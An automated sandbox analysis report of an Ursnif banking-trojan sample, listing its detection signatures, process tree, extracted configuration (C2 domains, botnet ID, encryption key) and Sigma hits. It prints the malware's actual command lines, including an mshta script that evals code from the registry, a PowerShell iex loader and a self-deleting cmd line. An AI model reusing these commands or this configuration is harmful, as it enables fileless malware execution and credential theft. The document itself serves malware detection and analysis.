Play interactive tour

Edit tour

Windows Analysis Report FpYf5EGDO9.exe

Overview

General Information

Sample Name:	FpYf5EGDO9.exe
Analysis ID:	527488
MD5:	2f1743897afa6f586ae97f53bf55c14e
SHA1:	21a51f4a3fa0c65509a1c7ef640f7e6b779aee49
SHA256:	440c297bcaa0e4ca3d84281d524b8351ad1ea2b5aabb22795db824a356cd54bd
Tags:	exeGoziISFBUrsnif
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (overwrites its own PE header)

Yara detected Ursnif

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Found malware configuration

Sigma detected: Powershell run code from registry

Multi AV Scanner detection for submitted file

Sigma detected: Encoded IEX

Tries to steal Mail credentials (via file / registry access)

Hooks registry keys query functions (used to hide registry keys)

Maps a DLL or memory area into another process

Uses nslookup.exe to query domains

Writes or reads registry keys via WMI

Machine Learning detection for sample

Allocates memory in foreign processes

May check the online IP address of the machine

Self deletion via cmd delete

Sigma detected: MSHTA Spawning Windows Shell

Creates a thread in another existing process (thread injection)

Disables SPDY (HTTP compression, likely to perform web injects)

Modifies the export address table of user mode modules (user mode EAT hooks)

Writes registry values via WMI

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

Changes memory attributes in foreign processes to executable or writable

Suspicious powershell command line found

Uses ping.exe to check the status of other devices and networks

Modifies the prolog of user mode functions (user mode inline hooks)

Uses ping.exe to sleep

Injects code into the Windows Explorer (explorer.exe)

Modifies the context of a thread in another process (thread injection)

Sigma detected: Mshta Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Modifies the import address table of user mode modules (user mode IAT hooks)

Antivirus or Machine Learning detection for unpacked file

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Searches for the Microsoft Outlook file path

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Compiles C# or VB.Net code

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Sigma detected: Suspicious Rundll32 Activity

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Classification

Process Tree

System is w10x64

FpYf5EGDO9.exe (PID: 5556 cmdline: "C:\Users\user\Desktop\FpYf5EGDO9.exe" MD5: 2F1743897AFA6F586AE97F53BF55C14E)

control.exe (PID: 2904 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cmd.exe (PID: 7028 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 4712 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)

RuntimeBroker.exe (PID: 4084 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

RuntimeBroker.exe (PID: 4176 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

RuntimeBroker.exe (PID: 4544 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

cmd.exe (PID: 6536 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\2227.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5192 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)

RuntimeBroker.exe (PID: 1504 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

cmd.exe (PID: 3424 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\2227.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6088 cmdline: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 6080 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)

mshta.exe (PID: 4720 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 4856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 6736 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 6272 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB8.tmp" "c:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 5464 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 6088 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A77.tmp" "c:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "dm+RfNkITE5FceWriGPYkZaFfoP/k2XQ2jeLd8rNgFw6gJ6fNWsHd0U6akxsQHth/SBWm4/eMI9Y1qgwNJteasgQsUC7Ht20y96mIxH1hvPh9uvLSH5z2CNo+fcP8K+V0yoOOQzDln/qE7mMJHLu+rmogHE7S6lb7FVy/7xxrRe3zMDt5K9bDwOreWw0blGE", "c2_domain": ["yahoo.com", "soderunovos.website", "qoderunovos.website", "https://soderunovos.website", "https://qoderunovos.website"], "botnet": "4482", "server": "12", "serpent_key": "10291029JSJUYNHG", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: FpYf5EGDO9.exe PID: 5556	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: powershell.exe PID: 4856	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: control.exe PID: 2904	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 4084	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 6080	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 4176	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 4440	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 4544	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: cmd.exe PID: 6088	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 61 entries

Unpacked PEs

Source	Rule	Description	Author
0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.FpYf5EGDO9.exe.3c40000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.FpYf5EGDO9.exe.43394a0.11.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Click to see the 2 entries

Sigma Overview

System Summary:

Sigma detected: Encoded IEX

Show sources

Source: Process started

Author: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 4856

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 4856

Sigma detected: Mshta Spawning Windows Shell

Show sources

Source: Process started

Sigma detected: Suspicious Csc.exe Source File Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4856, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline, ProcessId: 6736

Sigma detected: Suspicious Rundll32 Activity

Show sources

Source: Process started

Author: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 2904, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 6080

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 4856

Sigma detected: T1086 PowerShell Execution

Show sources

Source: Pipe created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132822035693761408.4856.DefaultAppDomain.powershell

Data Obfuscation:

Sigma detected: Powershell run code from registry

Show sources

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 4856

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.510101213.0000000002140000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"RSA Public Key": "dm+RfNkITE5FceWriGPYkZaFfoP/k2XQ2jeLd8rNgFw6gJ6fNWsHd0U6akxsQHth/SBWm4/eMI9Y1qgwNJteasgQsUC7Ht20y96mIxH1hvPh9uvLSH5z2CNo+fcP8K+V0yoOOQzDln/qE7mMJHLu+rmogHE7S6lb7FVy/7xxrRe3zMDt5K9bDwOreWw0blGE", "c2_domain": ["yahoo.com", "soderunovos.website", "qoderunovos.website", "https://soderunovos.website", "https://qoderunovos.website"], "botnet": "4482", "server": "12", "serpent_key": "10291029JSJUYNHG", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}

Multi AV Scanner detection for submitted file

Show sources

Source: FpYf5EGDO9.exe

Virustotal: Detection: 46%

Perma Link

Machine Learning detection for sample

Show sources

Source: FpYf5EGDO9.exe

Joe Sandbox ML: detected

Source: 0.2.FpYf5EGDO9.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.2.FpYf5EGDO9.exe.2140e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.FpYf5EGDO9.exe.2150000.0.unpack	Avira: Label: TR/Patched.Ren.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Unpacked PE file: 0.2.FpYf5EGDO9.exe.400000.0.unpack

Source: FpYf5EGDO9.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: unknown	HTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.3:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.44.9.140:443 -> 192.168.2.3:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.3:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 212.82.100.140:443 -> 192.168.2.3:49821 version: TLS 1.2

Source:	Binary string: .C:\Users\user\AppData\Local\Temp\4v5gswf4.pdb source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\4v5gswf4.pdbXP source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
Source:	Binary string: SC:\gapajoxo-luhibomihi za.pdbP+CD source: FpYf5EGDO9.exe
Source:	Binary string: C:\gapajoxo-luhibomihi za.pdb source: FpYf5EGDO9.exe
